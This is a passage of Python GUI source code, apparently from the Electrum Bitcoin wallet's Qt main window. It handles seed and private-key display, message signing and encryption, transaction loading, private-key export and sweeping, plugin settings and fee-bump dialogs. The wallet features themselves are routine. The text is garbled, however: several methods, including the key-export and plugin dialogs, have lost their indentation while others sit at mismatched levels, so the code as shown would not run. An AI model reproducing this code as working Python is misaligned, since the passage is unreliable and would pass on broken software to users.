            ks_w.setLayout(ks_vbox)
            mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
            mpk_text.setMaximumHeight(150)
            mpk_text.addCopyButton(self.app)
            run_hook('show_xpub_button', mpk_text, ks)
            der_path_hbox = QHBoxLayout()
            der_path_hbox.setContentsMargins(0, 0, 0, 0)
            der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
            der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
            der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
            der_path_hbox.addWidget(der_path_text)
            der_path_hbox.addStretch()
            ks_vbox.addWidget(QLabel(_("Master Public Key")))
            ks_vbox.addWidget(mpk_text)
            ks_vbox.addLayout(der_path_hbox)
            ks_stack.addWidget(ks_w)
        select_ks(0)
        vbox.addWidget(ks_stack)
    vbox.addStretch(1)
    btn_export_info = run_hook('wallet_info_buttons', self, dialog)
    btn_close = CloseButton(dialog)
    btns = Buttons(btn_export_info, btn_close)
    vbox.addLayout(btns)
    dialog.setLayout(vbox)
    dialog.exec_()
def remove_wallet(self):
    """Ask for confirmation, then delete the wallet file (password-protected)."""
    prompt = '\n'.join([
        _('Delete wallet file?'),
        "%s" % self.wallet.storage.path,
        _('If your wallet contains funds, make sure you have saved its seed.'),
    ])
    if self.question(prompt):
        self._delete_wallet()
@protected
def _delete_wallet(self, password):
    """Delete the wallet file via the daemon and close this window.

    *password* is supplied by the @protected decorator.
    """
    wallet_path = self.wallet.storage.path
    basename = os.path.basename(wallet_path)
    deleted = self.gui_object.daemon.delete_wallet(wallet_path)
    self.close()
    if deleted:
        self.show_error(_("Wallet removed: {}").format(basename))
    else:
        self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
    """Display the wallet seed (and passphrase) after password entry."""
    if not self.wallet.has_seed():
        self.show_message(_('This wallet has no seed'))
        return
    keystore = self.wallet.get_keystore()
    try:
        seed = keystore.get_seed(password)
        passphrase = keystore.get_passphrase(password)
    except BaseException as e:
        self.show_error(repr(e))
        return
    from .seed_dialog import SeedDialog
    SeedDialog(self, seed, passphrase, config=self.config).exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
                help_text=None, show_copy_text_btn=False):
    """Pop up a modal QR-code dialog for *data*; no-op when data is empty."""
    if not data:
        return
    dlg = QRDialog(
        data=data,
        parent=parent or self,
        title=title,
        help_text=help_text,
        show_copy_text_btn=show_copy_text_btn,
        config=self.config,
    )
    dlg.exec_()
@protected
def show_private_key(self, address, password):
    """Display the WIF private key (text + QR) for *address*."""
    if not address:
        return
    try:
        pk = self.wallet.export_private_key(address, password)
    except Exception as e:
        self.logger.exception('')
        self.show_message(repr(e))
        return
    xtype = bitcoin.deserialize_privkey(pk)[0]
    dlg = WindowModalDialog(self, _("Private key"))
    dlg.setMinimumSize(600, 150)
    layout = QVBoxLayout()
    layout.addWidget(QLabel(_("Address") + ': ' + address))
    layout.addWidget(QLabel(_("Script type") + ': ' + xtype))
    layout.addWidget(QLabel(_("Private key") + ':'))
    key_edit = ShowQRTextEdit(text=pk, config=self.config)
    key_edit.addCopyButton(self.app)
    layout.addWidget(key_edit)
    layout.addLayout(Buttons(CloseButton(dlg)))
    dlg.setLayout(layout)
    dlg.exec_()
# Shown by do_sign() when the entered address type has no unique public key,
# so message signing/verification is undefined for it.
msg_sign = _("Signing with an address actually means signing with the corresponding "
             "private key, and verifying with the corresponding public key. The "
             "address you have entered does not have a unique public key, so these "
             "operations cannot be performed.") + '\n\n' + \
           _('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
    """Sign the message field with *address*'s key; result fills the signature field.

    Runs asynchronously on the wallet thread; widget args are Qt edit fields.
    """
    address = address.text().strip()
    message = message.toPlainText().strip()
    if not bitcoin.is_address(address):
        self.show_message(_('Invalid Bitcoin address.'))
        return
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    if not self.wallet.is_mine(address):
        self.show_message(_('Address not in wallet.'))
        return
    txin_type = self.wallet.get_txin_type(address)
    if txin_type not in ('p2pkh', 'p2wpkh', 'p2wpkh-p2sh'):
        self.show_message(_('Cannot sign messages with this type of address:')
                          + ' ' + txin_type + '\n\n' + self.msg_sign)
        return
    def show_signed_message(sig):
        try:
            signature.setText(base64.b64encode(sig).decode('ascii'))
        except RuntimeError:
            # (signature) wrapped C/C++ object has been deleted
            pass
    task = partial(self.wallet.sign_message, address, message, password)
    self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
    """Verify a base64 signature over the message field for *address*."""
    address = address.text().strip()
    message = message.toPlainText().strip().encode('utf-8')
    if not bitcoin.is_address(address):
        self.show_message(_('Invalid Bitcoin address.'))
        return
    verified = False
    try:
        # both base64 decoding and verification can throw on malformed input
        sig = base64.b64decode(str(signature.toPlainText()))
        verified = ecc.verify_message_with_address(address, sig, message)
    except Exception:
        pass
    if verified:
        self.show_message(_("Signature verified"))
    else:
        self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
    """Modal dialog with message/address/signature fields plus Sign/Verify buttons."""
    d = WindowModalDialog(self, _('Sign/verify Message'))
    d.setMinimumSize(610, 290)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    message_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    address_e = QLineEdit()
    address_e.setText(address)
    layout.addWidget(QLabel(_('Address')), 2, 0)
    layout.addWidget(address_e, 2, 1)
    signature_e = QTextEdit()
    signature_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Signature')), 3, 0)
    layout.addWidget(signature_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    b = QPushButton(_("Sign"))
    # do_sign/do_verify receive the widgets themselves and read them on click
    b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Verify"))
    b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
    """Decrypt the ciphertext field into the message field (async, wallet thread)."""
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    def set_plaintext(text):
        try:
            message_e.setText(text.decode('utf-8'))
        except RuntimeError:
            # (message_e) wrapped C/C++ object has been deleted
            pass
    cyphertext = encrypted_e.toPlainText()
    task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
    self.wallet.thread.add(task, on_success=set_plaintext)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
    """ECIES-encrypt the message field to the given public key."""
    plaintext = message_e.toPlainText().encode('utf-8')
    try:
        public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
    except BaseException:
        self.logger.exception('Invalid Public key')
        self.show_warning(_('Invalid Public key'))
        return
    encrypted = public_key.encrypt_message(plaintext)
    encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
    """Modal dialog with message/pubkey/ciphertext fields plus Encrypt/Decrypt buttons.

    When *address* is given, its public key prefills the pubkey field.
    """
    d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
    d.setMinimumSize(610, 490)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    message_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    pubkey_e = QLineEdit()
    if address:
        pubkey = self.wallet.get_public_key(address)
        pubkey_e.setText(pubkey)
    layout.addWidget(QLabel(_('Public key')), 2, 0)
    layout.addWidget(pubkey_e, 2, 1)
    encrypted_e = QTextEdit()
    encrypted_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Encrypted')), 3, 0)
    layout.addWidget(encrypted_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    b = QPushButton(_("Encrypt"))
    # handlers receive the widgets and read them when clicked
    b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Decrypt"))
    b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
def password_dialog(self, msg=None, parent=None):
    """Prompt for the wallet password; return the entered password or None."""
    from .password_dialog import PasswordDialog
    return PasswordDialog(parent or self, msg).run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
    """Best-effort parse of raw/PSBT transaction text; shows an error on failure."""
    from electrum.transaction import tx_from_any
    try:
        return tx_from_any(data)
    except BaseException as e:
        self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
        return None
def import_channel_backup(self, encrypted: str):
    """After confirmation, restore a lightning channel from an encrypted backup."""
    if not self.question('Import channel backup?'):
        return
    try:
        self.wallet.lnbackups.import_channel_backup(encrypted)
    except Exception as e:
        self.show_error("failed to import backup" + '\n' + str(e))
def read_tx_from_qrcode(self):
    """Scan a QR code and dispatch: BIP21 URI, channel backup, or raw tx."""
    from electrum import qrscanner
    try:
        data = qrscanner.scan_barcode(self.config.get_video_device())
    except BaseException as e:
        self.show_error(repr(e))
        return
    if not data:
        return
    lowered = data.lower()
    # if the user scanned a bitcoin URI
    if lowered.startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
        self.pay_to_URI(data)
        return
    if lowered.startswith('channel_backup:'):
        self.import_channel_backup(data)
        return
    # else if the user scanned an offline signed tx
    tx = self.tx_from_text(data)
    if tx:
        self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
    """Let the user pick a transaction file and parse its contents."""
    fileName = getOpenFileName(
        parent=self,
        title=_("Select your transaction file"),
        filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
        config=self.config,
    )
    if not fileName:
        return None
    try:
        with open(fileName, "rb") as f:
            file_content = f.read()  # type: Union[str, bytes]
    except (ValueError, IOError, os.error) as reason:
        self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
                           title=_("Unable to read file or no transaction found"))
        return None
    return self.tx_from_text(file_content)
def do_process_from_text(self):
    """Prompt for raw transaction text and show the parsed transaction."""
    text = text_dialog(
        parent=self,
        title=_('Input raw transaction'),
        header_layout=_("Transaction:"),
        ok_label=_("Load transaction"),
        config=self.config,
    )
    if not text:
        return
    parsed = self.tx_from_text(text)
    if parsed:
        self.show_transaction(parsed)
def do_process_from_text_channel_backup(self):
    """Prompt for a channel backup string and import it if well-formed."""
    text = text_dialog(
        parent=self,
        title=_('Input channel backup'),
        header_layout=_("Channel Backup:"),
        ok_label=_("Load backup"),
        config=self.config,
    )
    if text and text.startswith('channel_backup:'):
        self.import_channel_backup(text)
def do_process_from_file(self):
    """Load a transaction from a file and show it."""
    parsed = self.read_tx_from_file()
    if parsed:
        self.show_transaction(parsed)
def do_process_from_txid(self):
    """Fetch a transaction by txid from the network and show it."""
    from electrum import transaction
    txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
    if not ok or not txid:
        return
    txid = str(txid).strip()
    try:
        raw_tx = self.network.run_from_another_thread(
            self.network.get_transaction(txid, timeout=10))
    except UntrustedServerReturnedError as e:
        self.logger.info(f"Error getting transaction from network: {repr(e)}")
        self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
        return
    except Exception as e:
        self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
        return
    self.show_transaction(transaction.Transaction(raw_tx))
@protected
def export_privkeys_dialog(self, password):
    """Export all private keys to a CSV/JSON file chosen by the user.

    Keys are derived on a background thread; progress is reported to the GUI
    via computing_privkeys_signal / show_privkeys_signal. The done/cancelled
    flags coordinate thread shutdown with dialog close.
    """
    if self.wallet.is_watching_only():
        self.show_message(_("This is a watching-only wallet"))
        return
    if isinstance(self.wallet, Multisig_Wallet):
        self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                          _('It cannot be "backed up" by simply exporting these private keys.'))
    d = WindowModalDialog(self, _('Private keys'))
    d.setMinimumSize(980, 300)
    vbox = QVBoxLayout(d)
    msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                          _("Exposing a single private key can compromise your entire wallet!"),
                          _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
    vbox.addWidget(QLabel(msg))
    e = QTextEdit()
    e.setReadOnly(True)
    vbox.addWidget(e)
    defaultname = 'electrum-private-keys.csv'
    select_msg = _('Select file to export your private keys to')
    hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
    vbox.addLayout(hbox)
    # export button stays disabled until all keys have been derived
    b = OkButton(d, _('Export'))
    b.setEnabled(False)
    vbox.addLayout(Buttons(CancelButton(d), b))
    private_keys = {}
    addresses = self.wallet.get_addresses()
    done = False
    cancelled = False
    def privkeys_thread():
        # background thread: derive one key at a time, notifying the GUI
        for addr in addresses:
            time.sleep(0.1)
            if done or cancelled:
                break
            privkey = self.wallet.export_private_key(addr, password)
            private_keys[addr] = privkey
            self.computing_privkeys_signal.emit()
        if not cancelled:
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.emit()
    def show_privkeys():
        # GUI thread: display the full list and enable the export button
        s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
        e.setText(s)
        b.setEnabled(True)
        self.show_privkeys_signal.disconnect()
        nonlocal done
        done = True
    def on_dialog_closed(*args):
        # disconnect signals only if the thread has not already done so
        nonlocal done
        nonlocal cancelled
        if not done:
            cancelled = True
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.disconnect()
    self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
    self.show_privkeys_signal.connect(show_privkeys)
    d.finished.connect(on_dialog_closed)
    threading.Thread(target=privkeys_thread).start()
    if not d.exec_():
        done = True
        return
    filename = filename_e.text()
    if not filename:
        return
    try:
        self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
    except (IOError, os.error) as reason:
        txt = "\n".join([
            _("Electrum was unable to produce a private key-export."),
            str(reason)
        ])
        self.show_critical(txt, title=_("Unable to create csv"))
    except Exception as e:
        self.show_message(repr(e))
        return
    self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
    def do_import_labels(self):
        """Import address/tx labels from a user-chosen file via the generic meta-import GUI."""
        def on_import():
            # Labels affect the history/address views; schedule a refresh.
            self.need_update.set()
        import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
    def do_export_labels(self):
        """Export all labels to a user-chosen file."""
        export_meta_gui(self, _('labels'), self.wallet.export_labels)
    def import_invoices(self):
        """Import invoices from a file, then refresh the invoice list."""
        import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
    def export_invoices(self):
        """Export invoices to a file."""
        export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
    def import_requests(self):
        """Import payment requests from a file, then refresh the request list."""
        import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
    def export_requests(self):
        """Export payment requests to a file."""
        export_meta_gui(self, _('requests'), self.wallet.export_requests)
    def import_contacts(self):
        """Import contacts from a file, then refresh the contact list."""
        import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
    def export_contacts(self):
        """Export contacts to a file."""
        export_meta_gui(self, _('contacts'), self.contacts.export_file)
    def sweep_key_dialog(self):
        """Dialog to sweep funds from externally-held private keys into this wallet.

        The user pastes WIF keys and picks a destination address; a sweep
        transaction spending all discovered coins is then prepared in the
        background and handed to the normal send dialog.
        """
        d = WindowModalDialog(self, title=_('Sweep private keys'))
        d.setMinimumSize(600, 300)
        vbox = QVBoxLayout(d)
        hbox_top = QHBoxLayout()
        hbox_top.addWidget(QLabel(_("Enter private keys:")))
        hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
        vbox.addLayout(hbox_top)
        keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
        keys_e.setTabChangesFocus(True)
        vbox.addWidget(keys_e)
        # Prefer unused addresses; fall back for wallet types without the
        # receiving-address distinction.
        addresses = self.wallet.get_unused_addresses()
        if not addresses:
            try:
                addresses = self.wallet.get_receiving_addresses()
            except AttributeError:
                addresses = self.wallet.get_addresses()
        h, address_e = address_field(addresses)
        vbox.addLayout(h)
        vbox.addStretch(1)
        button = OkButton(d, _('Sweep'))
        vbox.addLayout(Buttons(CancelButton(d), button))
        button.setEnabled(False)
        def get_address():
            # Returns the destination address, or None if invalid.
            addr = str(address_e.text()).strip()
            if bitcoin.is_address(addr):
                return addr
        def get_pk(*, raise_on_error=False):
            text = str(keys_e.toPlainText())
            return keystore.get_private_keys(text, raise_on_error=raise_on_error)
        def on_edit():
            # Enable "Sweep" only when both keys and address validate.
            valid_privkeys = False
            try:
                valid_privkeys = get_pk(raise_on_error=True) is not None
            except Exception as e:
                button.setToolTip(f'{_("Error")}: {repr(e)}')
            else:
                button.setToolTip('')
            button.setEnabled(get_address() is not None and valid_privkeys)
        on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
        keys_e.textChanged.connect(on_edit)
        address_e.textChanged.connect(on_edit)
        address_e.textChanged.connect(on_address)
        on_address(str(address_e.text()))
        if not d.exec_():
            return
        # user pressed "sweep"
        addr = get_address()
        try:
            self.wallet.check_address_for_corruption(addr)
        except InternalAddressCorruption as e:
            # Re-raise after showing: sweeping to a corrupted address would lose funds.
            self.show_error(str(e))
            raise
        privkeys = get_pk()
        def on_success(result):
            coins, keypairs = result
            # '!' means "spend the maximum available amount".
            outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
            self.warn_if_watching_only()
            self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
        def on_failure(exc_info):
            self.on_error(exc_info)
        msg = _('Preparing sweep transaction...')
        task = lambda: self.network.run_from_another_thread(
            sweep_preparations(privkeys, self.network))
        WaitingDialog(self, msg, task, on_success, on_failure)
    def _do_import(self, title, header_layout, func):
        """Generic multi-line text import helper.

        Shows a text dialog, splits the entered text on whitespace, and
        passes the resulting list to `func`, which must return a
        (good_inputs, bad_inputs) pair where bad_inputs is a list of
        (key, error_message) tuples.  Summaries (truncated to 10 entries)
        are shown to the user, then the address/history views refresh.
        """
        text = text_dialog(
            parent=self,
            title=title,
            header_layout=header_layout,
            ok_label=_('Import'),
            allow_multi=True,
            config=self.config,
        )
        if not text:
            return
        keys = str(text).split()
        good_inputs, bad_inputs = func(keys)
        if good_inputs:
            msg = '\n'.join(good_inputs[:10])
            if len(good_inputs) > 10: msg += '\n...'
            self.show_message(_("The following addresses were added")
                              + f' ({len(good_inputs)}):\n' + msg)
        if bad_inputs:
            # NOTE: `msg` inside the genexp is the per-item error message
            # (the loop variable), not the outer `msg` being assigned.
            msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
            if len(bad_inputs) > 10: msg += '\n...'
            self.show_error(_("The following inputs could not be imported")
                            + f' ({len(bad_inputs)}):\n' + msg)
        self.address_list.update()
        self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
    def settings_dialog(self):
        """Open the modal settings dialog and apply side effects on close.

        The alias signal is connected only for the dialog's lifetime;
        exchange rates are re-fetched and plugins notified afterwards.
        """
        from .settings_dialog import SettingsDialog
        d = SettingsDialog(self, self.config)
        self.alias_received_signal.connect(d.set_alias_color)
        d.exec_()
        # Disconnect immediately after the modal loop returns so stale
        # alias updates don't touch a destroyed dialog.
        self.alias_received_signal.disconnect(d.set_alias_color)
        if self.fx:
            self.fx.trigger_update()
        run_hook('close_settings_dialog')
        if d.need_restart:
            self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
    def clean_up(self):
        """Tear down the window: stop threads, persist geometry/history, close wallet.

        Order matters: the wallet thread is stopped and callbacks
        unregistered before any state is written to the DB.
        """
        self.wallet.thread.stop()
        util.unregister_callback(self.on_network)
        self.config.set_key("is_maximized", self.isMaximized())
        if not self.isMaximized():
            # Only persist an explicit geometry when not maximized.
            g = self.geometry()
            self.wallet.db.put("winpos-qt", [g.left(),g.top(),
                                            g.width(),g.height()])
        # Keep only the most recent 50 console entries.
        self.wallet.db.put("qt-console-history", self.console.history[-50:])
        if self.qr_window:
            self.qr_window.close()
        self.close_wallet()
        self.gui_object.timer.timeout.disconnect(self.timer_actions)
        self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
    def cpfp_dialog(self, parent_tx: Transaction) -> None:
        """Dialog to build a Child-Pays-For-Parent transaction for `parent_tx`.

        A zero-fee child is first built to measure sizes; the user then picks
        the child's fee (seeded from current fee estimates) and the real
        child tx is created and shown.
        """
        new_tx = self.wallet.cpfp(parent_tx, 0)
        total_size = parent_tx.estimated_size() + new_tx.estimated_size()
        parent_txid = parent_tx.txid()
        assert parent_txid
        parent_fee = self.wallet.get_tx_fee(parent_txid)
        if parent_fee is None:
            self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
            return
        d = WindowModalDialog(self, _('Child Pays for Parent'))
        vbox = QVBoxLayout(d)
        msg = (
            "A CPFP is a transaction that sends an unconfirmed output back to "
            "yourself, with a high fee. The goal is to have miners confirm "
            "the parent transaction in order to get the fee attached to the "
            "child transaction.")
        vbox.addWidget(WWLabel(_(msg)))
        msg2 = ("The proposed fee is computed using your "
            "fee/kB settings, applied to the total size of both child and "
            "parent transactions. After you broadcast a CPFP transaction, "
            "it is normal to see a new unconfirmed transaction in your history.")
        vbox.addWidget(WWLabel(_(msg2)))
        grid = QGridLayout()
        grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
        grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
        # max_fee is the whole child input amount: fee cannot exceed it.
        max_fee = new_tx.output_value()
        grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
        grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
        output_amount = QLabel('')
        grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
        grid.addWidget(output_amount, 2, 1)
        fee_e = BTCAmountEdit(self.get_decimal_point)
        # FIXME with dyn fees, without estimates, there are all kinds of crashes here
        combined_fee = QLabel('')
        combined_feerate = QLabel('')
        def on_fee_edit(x):
            # Recompute output amount and combined fee/feerate labels.
            fee_for_child = fee_e.get_amount()
            if fee_for_child is None:
                return
            out_amt = max_fee - fee_for_child
            out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
            output_amount.setText(out_amt_str)
            comb_fee = parent_fee + fee_for_child
            comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
            combined_fee.setText(comb_fee_str)
            comb_feerate = comb_fee / total_size * 1000
            comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
            combined_feerate.setText(comb_feerate_str)
        fee_e.textChanged.connect(on_fee_edit)
        def get_child_fee_from_total_feerate(fee_per_kb):
            # Child fee = desired combined fee minus what the parent pays,
            # clamped to [1 sat/byte combined, max_fee].
            fee = fee_per_kb * total_size / 1000 - parent_fee
            fee = min(max_fee, fee)
            fee = max(total_size, fee)  # pay at least 1 sat/byte for combined size
            return fee
        suggested_feerate = self.config.fee_per_kb()
        if suggested_feerate is None:
            self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
            return
        fee = get_child_fee_from_total_feerate(suggested_feerate)
        fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
        grid.addWidget(fee_e, 3, 1)
        def on_rate(dyn, pos, fee_rate):
            fee = get_child_fee_from_total_feerate(fee_rate)
            fee_e.setAmount(fee)
        fee_slider = FeeSlider(self, self.config, on_rate)
        fee_combo = FeeComboBox(fee_slider)
        fee_slider.update()
        grid.addWidget(fee_slider, 4, 1)
        grid.addWidget(fee_combo, 4, 2)
        grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
        grid.addWidget(combined_fee, 5, 1)
        grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
        grid.addWidget(combined_feerate, 6, 1)
        vbox.addLayout(grid)
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if not d.exec_():
            return
        fee = fee_e.get_amount()
        if fee is None:
            return  # fee left empty, treat as "cancel"
        if fee > max_fee:
            self.show_error(_('Max fee exceeded'))
            return
        try:
            new_tx = self.wallet.cpfp(parent_tx, fee)
        except CannotCPFP as e:
            self.show_error(str(e))
            return
        new_tx.set_rbf(True)
        self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
    def _rbf_dialog(self, tx: Transaction, func, title, help_text):
        """Shared dialog for RBF operations (fee bump / cancel).

        `func(new_fee_rate)` must return the replacement transaction (or
        raise); it is called live while the user edits the fee rate so the
        OK button reflects feasibility, and once more on confirm.
        """
        txid = tx.txid()
        assert txid
        if not isinstance(tx, PartialTransaction):
            tx = PartialTransaction.from_tx(tx)
        if not self._add_info_to_tx_from_wallet_and_network(tx):
            return
        fee = tx.get_fee()
        assert fee is not None
        tx_label = self.wallet.get_label_for_txid(txid)
        tx_size = tx.estimated_size()
        old_fee_rate = fee / tx_size  # sat/vbyte
        d = WindowModalDialog(self, title)
        vbox = QVBoxLayout(d)
        vbox.addWidget(WWLabel(help_text))
        ok_button = OkButton(d)
        warning_label = WWLabel('\n')
        warning_label.setStyleSheet(ColorScheme.RED.as_stylesheet())
        feerate_e = FeerateEdit(lambda: 0)
        # Seed with a meaningful bump: 1.5x the old rate, at least +1 sat/vB.
        feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
        def on_feerate():
            # Dry-run the replacement to validate the entered fee rate.
            fee_rate = feerate_e.get_amount()
            warning_text = '\n'
            if fee_rate is not None:
                try:
                    new_tx = func(fee_rate)
                except Exception as e:
                    new_tx = None
                    warning_text = str(e).replace('\n',' ')
            else:
                new_tx = None
            ok_button.setEnabled(new_tx is not None)
